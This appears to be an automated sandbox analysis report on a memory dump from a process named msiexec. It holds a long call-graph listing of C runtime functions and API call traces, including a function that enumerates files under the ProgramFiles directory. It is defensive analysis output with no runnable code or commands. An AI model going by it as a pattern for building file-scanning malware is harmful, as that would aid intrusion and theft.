21202639 ___scrt_fastfail 4 API calls 6331->6332 6334 212024d5 ___scrt_release_startup_lock 6331->6334 6333 21202559 6332->6333 6334->6230 7173 212067bf 7178 212067f4 7173->7178 7176 212067db 7177 2120571e _free 20 API calls 7177->7176 7179 21206806 7178->7179 7180 212067cd 7178->7180 7181 21206836 7179->7181 7182 2120680b 7179->7182 7180->7176 7180->7177 7181->7180 7189 212071d6 7181->7189 7183 2120637b _abort 20 API calls 7182->7183 7184 21206814 7183->7184 7186 2120571e _free 20 API calls 7184->7186 7186->7180 7187 21206851 7188 2120571e _free 20 API calls 7187->7188 7188->7180 7190 212071e1 7189->7190 7191 21207209 7190->7191 7192 212071fa 7190->7192 7196 21207218 7191->7196 7198 21208a98 7191->7198 7193 21206368 _free 20 API calls 7192->7193 7197 212071ff ___scrt_fastfail 7193->7197 7205 21208acb 7196->7205 7197->7187 7199 21208aa3 7198->7199 7200 21208ab8 RtlSizeHeap 7198->7200 7201 21206368 _free 20 API calls 7199->7201 7200->7196 7202 21208aa8 7201->7202 7203 212062ac _abort 26 API calls 7202->7203 7204 21208ab3 7203->7204 7204->7196 7206 21208ae3 7205->7206 7207 21208ad8 7205->7207 7208 21208aeb 7206->7208 7215 21208af4 _abort 7206->7215 7217 212056d0 7207->7217 7210 2120571e _free 20 API calls 7208->7210 7213 21208ae0 7210->7213 7211 21208af9 7214 21206368 _free 20 API calls 7211->7214 7212 21208b1e RtlReAllocateHeap 7212->7213 7212->7215 7213->7197 7214->7213 7215->7211 7215->7212 7216 2120474f _abort 7 API calls 7215->7216 7216->7215 7218 2120570e 7217->7218 7219 212056de _abort 7217->7219 7220 21206368 _free 20 API calls 7218->7220 7219->7218 7221 212056f9 RtlAllocateHeap 7219->7221 7223 2120474f _abort 7 API calls 7219->7223 7222 2120570c 7220->7222 7221->7219 7221->7222 7222->7213 7223->7219 7459 21205bff 7467 21205d5c 7459->7467 7462 21205c13 7463 21205b7a _abort 20 API calls 7464 21205c1b 7463->7464 7465 21205c28 7464->7465 7466 21205c2b 11 API calls 7464->7466 7466->7462 7468 21205c45 _abort 5 API calls 7467->7468 7469 21205d83 7468->7469 7470 
21205d9b TlsAlloc 7469->7470 7471 21205d8c 7469->7471 7470->7471 7472 21202ada _ValidateLocalCookies 5 API calls 7471->7472 7473 21205c09 7472->7473 7473->7462 7473->7463 6478 21208640 6481 21208657 6478->6481 6482 21208665 6481->6482 6483 21208679 6481->6483 6486 21206368 _free 20 API calls 6482->6486 6484 21208681 6483->6484 6485 21208693 6483->6485 6487 21206368 _free 20 API calls 6484->6487 6493 21208652 6485->6493 6494 212054a7 6485->6494 6488 2120866a 6486->6488 6490 21208686 6487->6490 6489 212062ac _abort 26 API calls 6488->6489 6489->6493 6492 212062ac _abort 26 API calls 6490->6492 6492->6493 6495 212054c4 6494->6495 6496 212054ba 6494->6496 6495->6496 6497 21205af6 _abort 38 API calls 6495->6497 6496->6493 6498 212054e5 6497->6498 6502 21207a00 6498->6502 6503 212054fe 6502->6503 6504 21207a13 6502->6504 6506 21207a2d 6503->6506 6504->6503 6510 21207f0f 6504->6510 6507 21207a40 6506->6507 6508 21207a55 6506->6508 6507->6508 6645 21206d7e 6507->6645 6508->6496 6511 21207f1b ___scrt_is_nonwritable_in_current_image 6510->6511 6512 21205af6 _abort 38 API calls 6511->6512 6513 21207f24 6512->6513 6514 21207f72 _abort 6513->6514 6522 21205671 RtlEnterCriticalSection 6513->6522 6514->6503 6516 21207f42 6523 21207f86 6516->6523 6521 212055a8 _abort 38 API calls 6521->6514 6522->6516 6524 21207f94 __fassign 6523->6524 6526 21207f56 6523->6526 6524->6526 6530 21207cc2 6524->6530 6527 21207f75 6526->6527 6644 212056b9 RtlLeaveCriticalSection 6527->6644 6529 21207f69 6529->6514 6529->6521 6531 21207d42 6530->6531 6534 21207cd8 6530->6534 6532 21207d90 6531->6532 6535 2120571e _free 20 API calls 6531->6535 6598 21207e35 6532->6598 6534->6531 6536 21207d0b 6534->6536 6541 2120571e _free 20 API calls 6534->6541 6537 21207d64 6535->6537 6538 21207d2d 6536->6538 6547 2120571e _free 20 API calls 6536->6547 6539 2120571e _free 20 API calls 6537->6539 6540 2120571e _free 20 API calls 6538->6540 6542 21207d77 6539->6542 6543 21207d37 6540->6543 6545 21207d00 6541->6545 6548 
2120571e _free 20 API calls 6542->6548 6551 2120571e _free 20 API calls 6543->6551 6544 21207dfe 6552 2120571e _free 20 API calls 6544->6552 6558 212090ba 6545->6558 6546 21207d9e 6546->6544 6557 2120571e 20 API calls _free 6546->6557 6549 21207d22 6547->6549 6550 21207d85 6548->6550 6586 212091b8 6549->6586 6555 2120571e _free 20 API calls 6550->6555 6551->6531 6556 21207e04 6552->6556 6555->6532 6556->6526 6557->6546 6559 212090cb 6558->6559 6585 212091b4 6558->6585 6560 212090dc 6559->6560 6561 2120571e _free 20 API calls 6559->6561 6562 212090ee 6560->6562 6563 2120571e _free 20 API calls 6560->6563 6561->6560 6564 21209100 6562->6564 6565 2120571e _free 20 API calls 6562->6565 6563->6562 6566 21209112 6564->6566 6567 2120571e _free 20 API calls 6564->6567 6565->6564 6568 21209124 6566->6568 6569 2120571e _free 20 API calls 6566->6569 6567->6566 6570 21209136 6568->6570 6571 2120571e _free 20 API calls 6568->6571 6569->6568 6572 21209148 6570->6572 6573 2120571e _free 20 API calls 6570->6573 6571->6570 6574 2120915a 6572->6574 6575 2120571e _free 20 API calls 6572->6575 6573->6572 6576 2120916c 6574->6576 6577 2120571e _free 20 API calls 6574->6577 6575->6574 6578 2120917e 6576->6578 6579 2120571e _free 20 API calls 6576->6579 6577->6576 6580 2120571e _free 20 API calls 6578->6580 6582 21209190 6578->6582 6579->6578 6580->6582 6581 2120571e _free 20 API calls 6583 212091a2 6581->6583 6582->6581 6582->6583 6584 2120571e _free 20 API calls 6583->6584 6583->6585 6584->6585 6585->6536 6587 212091c5 6586->6587 6588 2120921d 6586->6588 6589 212091d5 6587->6589 6590 2120571e _free 20 API calls 6587->6590 6588->6538 6591 212091e7 6589->6591 6592 2120571e _free 20 API calls 6589->6592 6590->6589 6593 212091f9 6591->6593 6594 2120571e _free 20 API calls 6591->6594 6592->6591 6595 2120920b 6593->6595 6596 2120571e _free 20 API calls 6593->6596 6594->6593 6595->6588 6597 2120571e _free 20 API calls 6595->6597 6596->6595 6597->6588 6599 21207e60 6598->6599 6600 21207e42 
6598->6600 6599->6546 6600->6599 6604 2120925d 6600->6604 6603 2120571e _free 20 API calls 6603->6599 6605 21207e5a 6604->6605 6606 2120926e 6604->6606 6605->6603 6640 21209221 6606->6640 6609 21209221 __fassign 20 API calls 6610 21209281 6609->6610 6611 21209221 __fassign 20 API calls 6610->6611 6612 2120928c 6611->6612 6613 21209221 __fassign 20 API calls 6612->6613 6614 21209297 6613->6614 6615 21209221 __fassign 20 API calls 6614->6615 6616 212092a5 6615->6616 6617 2120571e _free 20 API calls 6616->6617 6618 212092b0 6617->6618 6619 2120571e _free 20 API calls 6618->6619 6620 212092bb 6619->6620 6621 2120571e _free 20 API calls 6620->6621 6622 212092c6 6621->6622 6623 21209221 __fassign 20 API calls 6622->6623 6624 212092d4 6623->6624 6625 21209221 __fassign 20 API calls 6624->6625 6626 212092e2 6625->6626 6627 21209221 __fassign 20 API calls 6626->6627 6628 212092f3 6627->6628 6629 21209221 __fassign 20 API calls 6628->6629 6630 21209301 6629->6630 6631 21209221 __fassign 20 API calls 6630->6631 6632 2120930f 6631->6632 6633 2120571e _free 20 API calls 6632->6633 6634 2120931a 6633->6634 6635 2120571e _free 20 API calls 6634->6635 6636 21209325 6635->6636 6637 2120571e _free 20 API calls 6636->6637 6638 21209330 6637->6638 6639 2120571e _free 20 API calls 6638->6639 6639->6605 6641 21209258 6640->6641 6642 21209248 6640->6642 6641->6609 6642->6641 6643 2120571e _free 20 API calls 6642->6643 6643->6642 6644->6529 6646 21206d8a ___scrt_is_nonwritable_in_current_image 6645->6646 6647 21205af6 _abort 38 API calls 6646->6647 6652 21206d94 6647->6652 6649 21206e18 _abort 6649->6508 6650 212055a8 _abort 38 API calls 6650->6652 6652->6649 6652->6650 6653 2120571e _free 20 API calls 6652->6653 6654 21205671 RtlEnterCriticalSection 6652->6654 6655 21206e0f 6652->6655 6653->6652 6654->6652 6658 212056b9 RtlLeaveCriticalSection 6655->6658 6657 21206e16 6657->6652 6658->6657 7224 21207a80 7225 21207a8d 7224->7225 7226 2120637b _abort 20 API calls 7225->7226 7227 21207aa7 
7226->7227 7228 2120571e _free 20 API calls 7227->7228 7229 21207ab3 7228->7229 7230 2120637b _abort 20 API calls 7229->7230 7234 21207ad9 7229->7234 7231 21207acd 7230->7231 7233 2120571e _free 20 API calls 7231->7233 7232 21205eb7 11 API calls 7232->7234 7233->7234 7234->7232 7235 21207ae5 7234->7235 6335 21207103 GetCommandLineA GetCommandLineW 6336 21205303 6339 212050a5 6336->6339 6348 2120502f 6339->6348 6342 2120502f 5 API calls 6343 212050c3 6342->6343 6352 21205000 6343->6352 6346 21205000 20 API calls 6347 212050d9 6346->6347 6349 21205048 6348->6349 6350 21202ada _ValidateLocalCookies 5 API calls 6349->6350 6351 21205069 6350->6351 6351->6342 6353 2120500d 6352->6353 6357 2120502a 6352->6357 6354 21205024 6353->6354 6355 2120571e _free 20 API calls 6353->6355 6356 2120571e _free 20 API calls 6354->6356 6355->6353 6356->6357 6357->6346 6659 2120af43 6660 2120af59 6659->6660 6661 2120af4d 6659->6661 6661->6660 6662 2120af52 CloseHandle 6661->6662 6662->6660 6663 2120a945 6665 2120a96d 6663->6665 6664 2120a9a5 6665->6664 6666 2120a997 6665->6666 6667 2120a99e 6665->6667 6672 2120aa17 6666->6672 6676 2120aa00 6667->6676 6673 2120aa20 6672->6673 6680 2120b19b 6673->6680 6677 2120aa20 6676->6677 6678 2120b19b __startOneArgErrorHandling 21 API calls 6677->6678 6679 2120a9a3 6678->6679 6681 2120b1da __startOneArgErrorHandling 6680->6681 6686 2120b25c __startOneArgErrorHandling 6681->6686 6690 2120b59e 6681->6690 6683 2120b286 6684 2120b8b2 __startOneArgErrorHandling 20 API calls 6683->6684 6685 2120b292 6683->6685 6684->6685 6688 21202ada _ValidateLocalCookies 5 API calls 6685->6688 6686->6683 6687 212078a3 __startOneArgErrorHandling 5 API calls 6686->6687 6687->6683 6689 2120a99c 6688->6689 6691 2120b5c1 __raise_exc RaiseException 6690->6691 6692 2120b5bc 6691->6692 6692->6686 7474 2120a1c6 IsProcessorFeaturePresent 7475 21207bc7 7476 21207bd3 ___scrt_is_nonwritable_in_current_image 7475->7476 7477 21207c0a _abort 7476->7477 7483 21205671 
RtlEnterCriticalSection 7476->7483 7479 21207be7 7480 21207f86 __fassign 20 API calls 7479->7480 7481 21207bf7 7480->7481 7484 21207c10 7481->7484 7483->7479 7487 212056b9 RtlLeaveCriticalSection 7484->7487 7486 21207c17 7486->7477 7487->7486 6693 21205348 6694 21203529 ___vcrt_uninitialize 8 API calls 6693->6694 6695 2120534f 6694->6695 6696 21207b48 6706 21208ebf 6696->6706 6700 21207b55 6719 2120907c 6700->6719 6703 21207b7f 6704 2120571e _free 20 API calls 6703->6704 6705 21207b8a 6704->6705 6723 21208ec8 6706->6723 6708 21207b50 6709 21208fdc 6708->6709 6710 21208fe8 ___scrt_is_nonwritable_in_current_image 6709->6710 6743 21205671 RtlEnterCriticalSection 6710->6743 6712 2120905e 6757 21209073 6712->6757 6714 21209032 RtlDeleteCriticalSection 6717 2120571e _free 20 API calls 6714->6717 6715 2120906a _abort 6715->6700 6718 21208ff3 6717->6718 6718->6712 6718->6714 6744 2120a09c 6718->6744 6720 21209092 6719->6720 6721 21207b64 RtlDeleteCriticalSection 6719->6721 6720->6721 6722 2120571e _free 20 API calls 6720->6722 6721->6700 6721->6703 6722->6721 6724 21208ed4 ___scrt_is_nonwritable_in_current_image 6723->6724 6733 21205671 RtlEnterCriticalSection 6724->6733 6726 21208f77 6738 21208f97 6726->6738 6730 21208f83 _abort 6730->6708 6731 21208ee3 6731->6726 6732 21208e78 66 API calls 6731->6732 6734 21207b94 RtlEnterCriticalSection 6731->6734 6735 21208f6d 6731->6735 6732->6731 6733->6731 6734->6731 6741 21207ba8 RtlLeaveCriticalSection 6735->6741 6737 21208f75 6737->6731 6742 212056b9 RtlLeaveCriticalSection 6738->6742 6740 21208f9e 6740->6730 6741->6737 6742->6740 6743->6718 6745 2120a0a8 ___scrt_is_nonwritable_in_current_image 6744->6745 6746 2120a0b9 6745->6746 6747 2120a0ce 6745->6747 6748 21206368 _free 20 API calls 6746->6748 6755 2120a0c9 _abort 6747->6755 6760 21207b94 RtlEnterCriticalSection 6747->6760 6749 2120a0be 6748->6749 6751 212062ac _abort 26 API calls 6749->6751 6751->6755 6752 2120a0ea 6761 2120a026 6752->6761 6754 2120a0f5 6777 2120a112 
6754->6777 6755->6718 7025 212056b9 RtlLeaveCriticalSection 6757->7025 6759 2120907a 6759->6715 6760->6752 6762 2120a033 6761->6762 6763 2120a048 6761->6763 6764 21206368 _free 20 API calls 6762->6764 6769 2120a043 6763->6769 6780 21208e12 6763->6780 6766 2120a038 6764->6766 6768 212062ac _abort 26 API calls 6766->6768 6768->6769 6769->6754 6770 2120907c 20 API calls 6771 2120a064 6770->6771 6786 21207a5a 6771->6786 6773 2120a06a 6793 2120adce 6773->6793 6776 2120571e _free 20 API calls 6776->6769 7024 21207ba8 RtlLeaveCriticalSection 6777->7024 6779 2120a11a 6779->6755 6781 21208e26 6780->6781 6782 21208e2a 6780->6782 6781->6770 6782->6781 6783 21207a5a 26 API calls 6782->6783 6784 21208e4a 6783->6784 6808 21209a22 6784->6808 6787 21207a66 6786->6787 6788 21207a7b 6786->6788 6789 21206368 _free 20 API calls 6787->6789 6788->6773 6790 21207a6b 6789->6790 6791 212062ac _abort 26 API calls 6790->6791 6792 21207a76 6791->6792 6792->6773 6794 2120adf2 6793->6794 6795 2120addd 6793->6795 6796 2120ae2d 6794->6796 6800 2120ae19 6794->6800 6797 21206355 __dosmaperr 20 API calls 6795->6797 6798 21206355 __dosmaperr 20 API calls 6796->6798 6799 2120ade2 6797->6799 6801 2120ae32 6798->6801 6802 21206368 _free 20 API calls 6799->6802 6981 2120ada6 6800->6981 6804 21206368 _free 20 API calls 6801->6804 6806 2120a070 6802->6806 6805 2120ae3a 6804->6805 6807 212062ac _abort 26 API calls 6805->6807 6806->6769 6806->6776 6807->6806 6809 21209a2e ___scrt_is_nonwritable_in_current_image 6808->6809 6810 21209a36 6809->6810 6811 21209a4e 6809->6811 6833 21206355 6810->6833 6812 21209aec 6811->6812 6816 21209a83 6811->6816 6814 21206355 __dosmaperr 20 API calls 6812->6814 6817 21209af1 6814->6817 6836 21208c7b RtlEnterCriticalSection 6816->6836 6821 21206368 _free 20 API calls 6817->6821 6818 21206368 _free 20 API calls 6819 21209a43 _abort 6818->6819 6819->6781 6823 21209af9 6821->6823 6822 21209a89 6824 21209aa5 6822->6824 6825 21209aba 6822->6825 6826 212062ac _abort 26 API calls 
6823->6826 6827 21206368 _free 20 API calls 6824->6827 6837 21209b0d 6825->6837 6826->6819 6829 21209aaa 6827->6829 6831 21206355 __dosmaperr 20 API calls 6829->6831 6830 21209ab5 6888 21209ae4 6830->6888 6831->6830 6834 21205b7a _abort 20 API calls 6833->6834 6835 2120635a 6834->6835 6835->6818 6836->6822 6838 21209b3b 6837->6838 6865 21209b34 6837->6865 6839 21209b5e 6838->6839 6840 21209b3f 6838->6840 6844 21209baf 6839->6844 6845 21209b92 6839->6845 6841 21206355 __dosmaperr 20 API calls 6840->6841 6843 21209b44 6841->6843 6842 21202ada _ValidateLocalCookies 5 API calls 6846 21209d15 6842->6846 6847 21206368 _free 20 API calls 6843->6847 6848 21209bc5 6844->6848 6891 2120a00b 6844->6891 6849 21206355 __dosmaperr 20 API calls 6845->6849 6846->6830 6850 21209b4b 6847->6850 6894 212096b2 6848->6894 6853 21209b97 6849->6853 6854 212062ac _abort 26 API calls 6850->6854 6856 21206368 _free 20 API calls 6853->6856 6854->6865 6859 21209b9f 6856->6859 6857 21209bd3 6863 21209bd7 6857->6863 6864 21209bf9 6857->6864 6858 21209c0c 6861 21209c20 6858->6861 6862 21209c66 WriteFile 6858->6862 6860 212062ac _abort 26 API calls 6859->6860 6860->6865 6868 21209c56 6861->6868 6869 21209c28 6861->6869 6866 21209c89 GetLastError 6862->6866 6871 21209bef 6862->6871 6870 21209ccd 6863->6870 6901 21209645 6863->6901 6906 21209492 GetConsoleCP 6864->6906 6865->6842 6866->6871 6932 21209728 6868->6932 6872 21209c46 6869->6872 6873 21209c2d 6869->6873 6870->6865 6876 21206368 _free 20 API calls 6870->6876 6871->6865 6871->6870 6879 21209ca9 6871->6879 6924 212098f5 6872->6924 6873->6870 6917 21209807 6873->6917 6878 21209cf2 6876->6878 6881 21206355 __dosmaperr 20 API calls 6878->6881 6882 21209cb0 6879->6882 6883 21209cc4 6879->6883 6881->6865 6884 21206368 _free 20 API calls 6882->6884 6939 21206332 6883->6939 6886 21209cb5 6884->6886 6887 21206355 __dosmaperr 20 API calls 6886->6887 6887->6865 6980 21208c9e RtlLeaveCriticalSection 6888->6980 6890 21209aea 6890->6819 6944 21209f8d 
6891->6944 6966 21208dbc 6894->6966 6896 212096c2 6897 212096c7 6896->6897 6898 21205af6 _abort 38 API calls 6896->6898 6897->6857 6897->6858 6899 212096ea 6898->6899 6899->6897 6900 21209708 GetConsoleMode 6899->6900 6900->6897 6902 2120969f 6901->6902 6905 2120966a 6901->6905 6902->6871 6903 2120a181 WriteConsoleW CreateFileW 6903->6905 6904 212096a1 GetLastError 6904->6902 6905->6902 6905->6903 6905->6904 6912 21209607 6906->6912 6915 212094f5 6906->6915 6907 21202ada _ValidateLocalCookies 5 API calls 6909 21209641 6907->6909 6909->6871 6910 212079e6 40 API calls __fassign 6910->6915 6911 2120957b WideCharToMultiByte 6911->6912 6913 212095a1 WriteFile 6911->6913 6912->6907 6914 2120962a GetLastError 6913->6914 6913->6915 6914->6912 6915->6910 6915->6911 6915->6912 6916 212095d2 WriteFile 6915->6916 6975 21207c19 6915->6975 6916->6914 6916->6915 6920 21209816 6917->6920 6918 212098d8 6921 21202ada _ValidateLocalCookies 5 API calls 6918->6921 6919 21209894 WriteFile 6919->6920 6922 212098da GetLastError 6919->6922 6920->6918 6920->6919 6923 212098f1 6921->6923 6922->6918 6923->6871 6927 21209904 6924->6927 6925 21209a0f 6926 21202ada _ValidateLocalCookies 5 API calls 6925->6926 6928 21209a1e 6926->6928 6927->6925 6929 21209986 WideCharToMultiByte 6927->6929 6931 212099bb WriteFile 6927->6931 6928->6871 6930 21209a07 GetLastError 6929->6930 6929->6931 6930->6925 6931->6927 6931->6930 6936 21209737 6932->6936 6933 212097ea 6934 21202ada _ValidateLocalCookies 5 API calls 6933->6934 6938 21209803 6934->6938 6935 212097a9 WriteFile 6935->6936 6937 212097ec GetLastError 6935->6937 6936->6933 6936->6935 6937->6933 6938->6871 6940 21206355 __dosmaperr 20 API calls 6939->6940 6941 2120633d _free 6940->6941 6942 21206368 _free 20 API calls 6941->6942 6943 21206350 6942->6943 6943->6865 6953 21208d52 6944->6953 6946 21209f9f 6947 21209fa7 6946->6947 6948 21209fb8 SetFilePointerEx 6946->6948 6949 21206368 _free 20 API calls 6947->6949 6950 21209fd0 GetLastError 6948->6950 
6951 21209fac 6948->6951 6949->6951 6952 21206332 __dosmaperr 20 API calls 6950->6952 6951->6848 6952->6951 6954 21208d74 6953->6954 6955 21208d5f 6953->6955 6957 21206355 __dosmaperr 20 API calls 6954->6957 6960 21208d99 6954->6960 6956 21206355 __dosmaperr 20 API calls 6955->6956 6958 21208d64 6956->6958 6961 21208da4 6957->6961 6959 21206368 _free 20 API calls 6958->6959 6962 21208d6c 6959->6962 6960->6946 6963 21206368 _free 20 API calls 6961->6963 6962->6946 6964 21208dac 6963->6964 6965 212062ac _abort 26 API calls 6964->6965 6965->6962 6967 21208dd6 6966->6967 6968 21208dc9 6966->6968 6970 21208de2 6967->6970 6971 21206368 _free 20 API calls 6967->6971 6969 21206368 _free 20 API calls 6968->6969 6972 21208dce 6969->6972 6970->6896 6973 21208e03 6971->6973 6972->6896 6974 212062ac _abort 26 API calls 6973->6974 6974->6972 6976 21205af6 _abort 38 API calls 6975->6976 6977 21207c24 6976->6977 6978 21207a00 __fassign 38 API calls 6977->6978 6979 21207c34 6978->6979 6979->6915 6980->6890 6984 2120ad24 6981->6984 6983 2120adca 6983->6806 6985 2120ad30 ___scrt_is_nonwritable_in_current_image 6984->6985 6995 21208c7b RtlEnterCriticalSection 6985->6995 6987 2120ad3e 6988 2120ad70 6987->6988 6989 2120ad65 6987->6989 6991 21206368 _free 20 API calls 6988->6991 6996 2120ae4d 6989->6996 6992 2120ad6b 6991->6992 7011 2120ad9a 6992->7011 6994 2120ad8d _abort 6994->6983 6995->6987 6997 21208d52 26 API calls 6996->6997 7000 2120ae5d 6997->7000 6998 2120ae63 7014 21208cc1 6998->7014 7000->6998 7001 2120ae95 7000->7001 7003 21208d52 26 API calls 7000->7003 7001->6998 7004 21208d52 26 API calls 7001->7004 7006 2120ae8c 7003->7006 7007 2120aea1 CloseHandle 7004->7007 7005 2120aedd 7005->6992 7009 21208d52 26 API calls 7006->7009 7007->6998 7010 2120aead GetLastError 7007->7010 7008 21206332 __dosmaperr 20 API calls 7008->7005 7009->7001 7010->6998 7023 21208c9e RtlLeaveCriticalSection 7011->7023 7013 2120ada4 7013->6994 7015 21208cd0 7014->7015 7016 21208d37 7014->7016 
7015->7016 7021 21208cfa 7015->7021 7017 21206368 _free 20 API calls 7016->7017 7018 21208d3c 7017->7018 7019 21206355 __dosmaperr 20 API calls 7018->7019 7020 21208d27 7019->7020 7020->7005 7020->7008 7021->7020 7022 21208d21 SetStdHandle 7021->7022 7022->7020 7023->7013 7024->6779 7025->6759 7026 21202049 7028 21202055 ___scrt_is_nonwritable_in_current_image 7026->7028 7027 2120205e 7028->7027 7029 212020d3 7028->7029 7030 2120207d 7028->7030 7032 21202639 ___scrt_fastfail 4 API calls 7029->7032 7040 2120244c 7030->7040 7033 212020da 7032->7033 7034 21202082 7049 21202308 7034->7049 7036 21202087 __RTC_Initialize 7052 212020c4 7036->7052 7038 2120209f 7055 2120260b 7038->7055 7041 21202451 ___scrt_release_startup_lock 7040->7041 7042 21202455 7041->7042 7045 21202461 7041->7045 7043 2120527a _abort 20 API calls 7042->7043 7044 2120245f 7043->7044 7044->7034 7046 2120246e 7045->7046 7047 2120499b _abort 28 API calls 7045->7047 7046->7034 7048 21204bbd 7047->7048 7048->7034 7061 212034c7 RtlInterlockedFlushSList 7049->7061 7051 21202312 7051->7036 7063 2120246f 7052->7063 7054 212020c9 ___scrt_release_startup_lock 7054->7038 7056 21202617 7055->7056 7057 2120262d 7056->7057 7082 212053ed 7056->7082 7057->7027 7060 21203529 ___vcrt_uninitialize 8 API calls 7060->7057 7062 212034d7 7061->7062 7062->7051 7068 212053ff 7063->7068 7066 2120391b ___vcrt_uninitialize_ptd 6 API calls 7067 2120354d 7066->7067 7067->7054 7071 21205c2b 7068->7071 7072 21202476 7071->7072 7073 21205c35 7071->7073 7072->7066 7075 21205db2 7073->7075 7076 21205c45 _abort 5 API calls 7075->7076 7077 21205dd9 7076->7077 7078 21205df1 TlsFree 7077->7078 7079 21205de5 7077->7079 7078->7079 7080 21202ada _ValidateLocalCookies 5 API calls 7079->7080 7081 21205e02 7080->7081 7081->7072 7085 212074da 7082->7085 7088 212074f3 7085->7088 7086 21202ada _ValidateLocalCookies 5 API calls 7087 21202625 7086->7087 7087->7060 7088->7086 7236 21208a89 7239 21206d60 7236->7239 7240 21206d69 7239->7240 7242 
21206d72 7239->7242 7243 21206c5f 7240->7243 7244 21205af6 _abort 38 API calls 7243->7244 7245 21206c6c 7244->7245 7246 21206d7e __fassign 38 API calls 7245->7246 7247 21206c74 7246->7247 7263 212069f3 7247->7263 7249 21206c8b 7249->7242 7251 212056d0 21 API calls 7252 21206c9c 7251->7252 7253 21206cce 7252->7253 7270 21206e20 7252->7270 7255 2120571e _free 20 API calls 7253->7255 7255->7249 7257 21206cc9 7258 21206368 _free 20 API calls 7257->7258 7258->7253 7259 21206d12 7259->7253 7280 212068c9 7259->7280 7260 21206ce6 7260->7259 7261 2120571e _free 20 API calls 7260->7261 7261->7259 7264 212054a7 __fassign 38 API calls 7263->7264 7265 21206a05 7264->7265 7266 21206a14 GetOEMCP 7265->7266 7267 21206a26 7265->7267 7268 21206a3d 7266->7268 7267->7268 7269 21206a2b GetACP 7267->7269 7268->7249 7268->7251 7269->7268 7271 212069f3 40 API calls 7270->7271 7272 21206e3f 7271->7272 7275 21206e90 IsValidCodePage 7272->7275 7277 21206e46 7272->7277 7279 21206eb5 ___scrt_fastfail 7272->7279 7273 21202ada _ValidateLocalCookies 5 API calls 7274 21206cc1 7273->7274 7274->7257 7274->7260 7276 21206ea2 GetCPInfo 7275->7276 7275->7277 7276->7277 7276->7279 7277->7273 7283 21206acb GetCPInfo 7279->7283 7356 21206886 7280->7356 7282 212068ed 7282->7253 7289 21206b05 7283->7289 7292 21206baf 7283->7292 7286 21202ada _ValidateLocalCookies 5 API calls 7288 21206c5b 7286->7288 7288->7277 7293 212086e4 7289->7293 7291 21208a3e 43 API calls 7291->7292 7292->7286 7294 212054a7 __fassign 38 API calls 7293->7294 7295 21208704 MultiByteToWideChar 7294->7295 7297 21208742 7295->7297 7305 212087da 7295->7305 7299 212056d0 21 API calls 7297->7299 7302 21208763 ___scrt_fastfail 7297->7302 7298 21202ada _ValidateLocalCookies 5 API calls 7300 21206b66 7298->7300 7299->7302 7307 21208a3e 7300->7307 7301 212087d4 7312 21208801 7301->7312 7302->7301 7304 212087a8 MultiByteToWideChar 7302->7304 7304->7301 7306 212087c4 GetStringTypeW 7304->7306 7305->7298 7306->7301 7308 212054a7 __fassign 38 API 

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21201137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 212011D0
                                                              • FindClose.KERNEL32(00000000), ref: 212011DB
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 297d4441e9ab2482b383d70febc1924d37f62381e28bcefed4e181003788c9c6
                                                              • Instruction ID: 1a3214f461930c56445468ae28c9912e79a4151388003f104647a2925c7ad49c
                                                              • Opcode Fuzzy Hash: 297d4441e9ab2482b383d70febc1924d37f62381e28bcefed4e181003788c9c6
                                                              • Instruction Fuzzy Hash: 2521D2725443196BD724EBA49C4CF9BBBDCEF94354F000A2AFA98D31D0EB35D6048796

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21201434
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21201137
                                                                • Part of subcall function 212010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201151
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120115C
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120116D
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120117C
                                                                • Part of subcall function 212010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201193
                                                                • Part of subcall function 212010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 212011D0
                                                                • Part of subcall function 212010F1: FindClose.KERNEL32(00000000), ref: 212011DB
                                                              • lstrlenW.KERNEL32(?), ref: 212014C5
                                                              • lstrlenW.KERNEL32(?), ref: 212014E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 2120150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201521
                                                              • lstrlenW.KERNEL32(?,?), ref: 21201547
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201553
                                                              • lstrlenW.KERNEL32(?,?), ref: 21201579
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201585
                                                              • lstrlenW.KERNEL32(?,?), ref: 212015AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 212015B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
